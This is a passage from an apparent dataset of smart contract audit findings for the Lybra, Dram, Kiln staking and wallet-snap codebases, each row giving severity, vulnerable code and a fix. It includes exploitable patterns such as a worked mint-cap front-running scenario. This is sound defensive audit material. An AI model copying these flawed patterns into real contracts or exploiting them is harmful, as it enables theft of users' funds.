Consider explicitly mentioning these mechanisms in the documentation as well.",,"```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, ""Borrowers collateral ratio should below badCollateralRatio"");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], ""a max of 50% collateral can be liquidated"");\\n require(EUSD.allowance(provider, address(this)) != 0, ""provider should authorize to provide liquidation EUSD"");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n" +Use the Same Solidity Version Across Contracts.,low,Most contracts use the same Solidity version with `pragma solidity ^0.8.17`. 
The only exception is the `StakingRewardsV2` contract which has `pragma solidity ^0.8`.\\n```\\npragma solidity ^0.8;\\n```\\n,"If all contracts will be tested and utilized together, it would be best to utilize and document the same version within all contract code to avoid any issues and inconsistencies that may arise across Solidity versions.",,```\\npragma solidity ^0.8;\\n```\\n +Missing Events.,low,"In a few cases in the Lybra Protocol system, there are contracts that are missing events in significant scenarios, such as important configuration changes like a price oracle change. Consider implementing more events in the below examples.\\nNo events in the contract:\\n```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n\\nMissing an event during a premature unlock:\\n```\\nfunction unlockPrematurely() external {\\n require(block.timestamp + exitCycle - 3 days > time2fullRedemption[msg.sender], ""ENW"");\\n uint256 burnAmount = getReservedLBRForVesting(msg.sender) - getPreUnlockableAmount(msg.sender);\\n uint256 amount = getPreUnlockableAmount(msg.sender) + getClaimAbleLBR(msg.sender);\\n if (amount > 0) {\\n LBR.mint(msg.sender, amount);\\n }\\n unstakeRatio[msg.sender] = 0;\\n time2fullRedemption[msg.sender] = 0;\\n grabableAmount += burnAmount;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setToken`, `setLBROracle`, and setPools:\\n```\\nfunction setToken(address \\_lbr, address \\_eslbr) 
external onlyOwner {\\n LBR = \\_lbr;\\n esLBR = \\_eslbr;\\n}\\n\\nfunction setLBROracle(address \\_lbrOracle) external onlyOwner {\\n lbrPriceFeed = AggregatorV3Interface(\\_lbrOracle);\\n}\\n\\nfunction setPools(address[] memory \\_vaults) external onlyOwner {\\n require(\\_vaults.length <= 10, ""EL"");\\n for (uint i = 0; i < \\_vaults.length; i++) {\\n require(configurator.mintVault(\\_vaults[i]), ""NOT\\_VAULT"");\\n }\\n vaults = \\_vaults;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setRewardsDuration` and setBoost:\\n```\\n// Allows the owner to set the rewards duration\\nfunction setRewardsDuration(uint256 \\_duration) external onlyOwner {\\n require(finishAt < block.timestamp, ""reward duration not finished"");\\n duration = \\_duration;\\n}\\n\\n// Allows the owner to set the boost contract address\\nfunction setBoost(address \\_boost) external onlyOwner {\\n esLBRBoost = IesLBRBoost(\\_boost);\\n}\\n```\\n\\nMissing event during what is essentially staking `LBR` into `esLBR` (such as in ProtocolRewardsPool.stake()). 
Consider an appropriate event here such as StakeLBR:\\n```\\nif(useLBR) {\\n IesLBR(miningIncentives.LBR()).burn(msg.sender, lbrAmount);\\n IesLBR(miningIncentives.esLBR()).mint(msg.sender, lbrAmount);\\n}\\n```\\n",Implement additional events as appropriate.,,```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n +Incorrect Interfaces,low,"In a few cases, incorrect interfaces are used on top of contracts. Though the effect is the same as the contracts are just tokens and follow the same interfaces, it is best practice to implement correct interfaces.\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nIPeUSD public EUSD;\\n```\\n\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nif (address(EUSD) == address(0)) EUSD = IPeUSD(\\_eusd);\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nIesLBR public LBR;\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nLBR = IesLBR(\\_lbr);\\n```\\n",Implement correct interfaces for consistency.,,```\\nIPeUSD public EUSD;\\n```\\n +Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport Security,medium,"The snaps RPC access is restricted to certain origins only. 
However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n",Implement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. Do not by default allow all subdomains.,,"```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n" +Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport Security Partially Addressed,medium,"The snaps RPC access is restricted to certain origins only. 
However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n",Resolution\\nThe client has issued the following statement:\\nChangesets:\\nsolflare-wallet/solflare-snap@749d2b0\\nsolflare-wallet/aptos-snap@eef10b5\\nsolflare-wallet/sui-snap@898295f\\nStatement from the Assessment Team:\\nImplement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. 
Do not by default allow all subdomains.,,"```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n" +All Roles Are Set to the Same Account.,low,"From talking to the team we know that all roles will be held by different timelock contracts. In the code they all are initiated to the same `admin` address. That would mean that most roles would need to be transferred. Given that each transfer take 2 transactions and there are 3 roles to transfer that would equate to 6 transactions just to properly set up the contract on deployment. That also increments the time it would take and space for making errors.\\nIt is also should be noted that the `regulator` role is not being initialized there at all.\\n```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\n","Resolution\\nAll roles, including regulatory manager, are now set to different accounts. The modification can be found in commit `b70348e6998e35282212243ea639d174ced1ef2d`\\nWe suggest passing several addresses into the constructor and setting them to the correct addresses right away. 
Alternatively one can not set them at all and grant those roles later in order to avoid revoking the roles that admin should not have, such as `SUPPLY_MANAGER_ROLE`.",,"```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\n" +Setting MintCap to a Specific Value Is Prone to Front-Running.,low,"`Dram` stable coin is using the approval-like model to set the minting caps of different operators, thus it is prone to the same front-run issues as the approval mechanism. When using the `setMintCap` function directly operator could front-run the transaction and completely spend the old cap and then spend the new one again after setting the transaction goes through.\\n```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n\\nImagine the following scenario:\\nAlice has a mint cap of 10.\\nA transaction is sent to the mem-pool to set it to 5 (decrease the cap). The intent is that Alice should only be able to mint 5 tokens.\\nAlice frontruns this transaction and mints 10 tokens.\\nOnce transaction 2 goes through Alice mints 5 more tokens.\\nIn total Alice minted 15 tokens.",Avoid using setting the specific mint caps and rather use increase/decrease methods that are present in the code already.,,"```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n" +Incorrect Priviliges setOperatorAddresses Acknowledged,high,"The function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. 
As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n","The modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.",,"```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n" +Unconstrained Snapshot While Setting Operator Limit,medium,"Function `setOperatorLimit` as the name 
says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n","If the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.",,```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n +Hardcoded Operator Limit Logic,medium,"The contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. 
If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\n","A better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.",,"```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n" +StakingContract - PubKey Length Checks Not Always Enforced,medium,"`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. 
This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. 
However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.","Enforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)",,"```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n" +Unpredictable Behavior Due to Admin Front Running or General Bad Timing,medium,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. 
This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. 
The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n +Potentially Uninitialized Implementations,medium,"Most contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are neither initialized explicitly nor protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdestructs, 
lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\n",Petrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.,,"```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n" +Operator May DoS the Withdrawal or Make It More Expensive,medium,"While collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. 
By doing this, it won't be receiving any rewards, but neither will the treasury or the withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer, making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n","A possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.",,"```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n" +ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided Argument,low,"The version to auto-initialize is not hardcoded with the constructor. 
On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\n","Similar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.",,```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n +StakingContract - Misleading Comment,low,The comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n,Rectify the comment to accurately describe the intention of the method/modifier.,,```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n +Impractical Checks for Global/Operator Fees and the Commission Limits,low,"The contract initialization 
sets up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n","The fees should be checked with a more practical limit. 
For instance, checking against a min - max limit, like 20% - 40%.",,```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n +Contracts Should Inherit From Their Interfaces,low,"The following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) 